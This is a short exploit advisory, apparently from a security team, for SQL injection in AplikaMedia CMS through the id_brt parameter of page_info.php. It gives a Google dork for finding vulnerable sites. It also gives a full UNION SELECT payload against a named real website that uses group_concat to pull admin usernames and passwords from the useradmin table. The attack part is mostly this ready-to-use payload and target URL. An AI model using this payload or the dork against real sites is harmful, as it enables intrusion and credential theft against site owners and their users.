AplikaMedia CMS suffers from a remote SQL injection vulnerability.
beb6e139aa9c26bb9c3de84b8752ffc774075526abfe9efb4c1f06bd3c67639b
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Details & Title]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~] AplikaMedia CMS Sql injection Vulnerability
[~] Author : H3X
[~] Credit : Sepehr Security Team
[~] Vulnerable Page : page_info.php?id_brt=
[~] Google Dork : inurl:page_info.php?id_brt=
[~] Affected Software : aplikamedia CMS / aplikamedia.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Exploit]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Exploit:
http://www.dyna-h2o.com/page_info.php?id_brt=[Sql_injection]
[+]Example:
http://www.dyna-h2o.com/page_info.php?id_brt=43%20and%201=2%20union%20select%200,1,2,3,4,0x483358205761732048657265202520536570656872205365637572697479205465616d,6,group_concat%28username,0x3a,password%29,8,9,10,11,12,13,14,15%20from%20useradmin--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Greetz]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[*]Greetz:thE_Knight - Einestin - Wizard - Naboodgar
C0NS74NTINE & all Sepehr Security Teams members
[*]our site: http://www.sepehr-team.org